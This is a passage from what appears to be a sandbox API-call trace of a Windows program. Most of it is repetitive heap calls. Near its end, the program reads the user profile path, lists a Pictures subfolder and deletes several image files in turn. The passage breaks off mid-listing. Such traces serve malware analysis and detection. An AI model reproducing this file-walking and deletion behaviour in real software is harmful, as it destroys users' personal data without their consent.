lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0255.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0255.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.557] CloseHandle (hObject=0x1f8) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0255.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0255.558] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0255.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.562] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0255.563] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.563] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0255.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0255.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c8d0 [0255.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/itO8mb4FwKJbnFD", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD", lpFilePart=0x8bedfc*="itO8mb4FwKJbnFD") returned 0x36 [0255.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0255.564] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd")) returned 0x10 [0255.565] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0fec740, ftCreationTime.dwHighDateTime=0x1d4c6bb, ftLastAccessTime.dwLowDateTime=0xc5750b60, ftLastAccessTime.dwHighDateTime=0x1d4c5bd, ftLastWriteTime.dwLowDateTime=0xc5750b60, ftLastWriteTime.dwHighDateTime=0x1d4c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x15de, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa57a0 [0255.565] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0fec740, ftCreationTime.dwHighDateTime=0x1d4c6bb, ftLastAccessTime.dwLowDateTime=0xc5750b60, ftLastAccessTime.dwHighDateTime=0x1d4c5bd, ftLastWriteTime.dwLowDateTime=0xc5750b60, ftLastWriteTime.dwHighDateTime=0x1d4c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x15de, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0255.565] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38262850, ftCreationTime.dwHighDateTime=0x1d4d1a9, ftLastAccessTime.dwLowDateTime=0x132bf180, ftLastAccessTime.dwHighDateTime=0x1d4d1c0, ftLastWriteTime.dwLowDateTime=0x132bf180, ftLastWriteTime.dwHighDateTime=0x1d4d1c0, nFileSizeHigh=0x0, nFileSizeLow=0x5287, dwReserved0=0x15de, dwReserved1=0x4, cFileName="-jiiJ4y9.jpg", cAlternateFileName="")) returned 1 [0255.565] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\-jiiJ4y9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\-jiij4y9.jpg")) returned 1 [0255.566] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64474db0, ftCreationTime.dwHighDateTime=0x1d4ce7f, ftLastAccessTime.dwLowDateTime=0xbfa4b2d0, ftLastAccessTime.dwHighDateTime=0x1d4cc57, ftLastWriteTime.dwLowDateTime=0xbfa4b2d0, ftLastWriteTime.dwHighDateTime=0x1d4cc57, nFileSizeHigh=0x0, nFileSizeLow=0xacc, dwReserved0=0x15de, dwReserved1=0x4, cFileName="7yo3Gaxe.bmp", cAlternateFileName="")) returned 1 [0255.566] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\7yo3Gaxe.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\7yo3gaxe.bmp")) returned 1 [0255.567] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21bd0c0, ftCreationTime.dwHighDateTime=0x1d4c9e8, ftLastAccessTime.dwLowDateTime=0x26c6e960, ftLastAccessTime.dwHighDateTime=0x1d4cfb4, ftLastWriteTime.dwLowDateTime=0x26c6e960, ftLastWriteTime.dwHighDateTime=0x1d4cfb4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x15de, dwReserved1=0x4, cFileName="BZEYv_E537sIgldJrM7", cAlternateFileName="BZEYV_~1")) returned 1 [0255.567] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1a982b0, ftCreationTime.dwHighDateTime=0x1d4cf46, ftLastAccessTime.dwLowDateTime=0x5b766fe0, ftLastAccessTime.dwHighDateTime=0x1d4c8a3, ftLastWriteTime.dwLowDateTime=0x5b766fe0, ftLastWriteTime.dwHighDateTime=0x1d4c8a3, nFileSizeHigh=0x0, nFileSizeLow=0x967a, dwReserved0=0x15de, dwReserved1=0x4, cFileName="cClOga1.jpg", cAlternateFileName="")) returned 1 [0255.567] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\cClOga1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\ccloga1.jpg")) returned 1 [0255.568] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab353ae0, ftCreationTime.dwHighDateTime=0x1d4d2ab, ftLastAccessTime.dwLowDateTime=0x67c3e3d0, ftLastAccessTime.dwHighDateTime=0x1d4d2bd, ftLastWriteTime.dwLowDateTime=0x67c3e3d0, ftLastWriteTime.dwHighDateTime=0x1d4d2bd, nFileSizeHigh=0x0, nFileSizeLow=0xd634, dwReserved0=0x15de, dwReserved1=0x4, cFileName="ewjtzpTelI0M.jpg", cAlternateFileName="EWJTZP~1.JPG")) returned 1 [0255.568] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD\\ewjtzpTelI0M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ito8mb4fwkjbnfd\\ewjtzpteli0m.jpg")) returned 1 [0255.568] FindNextFileW (in: hFindFile=0xaa57a0, 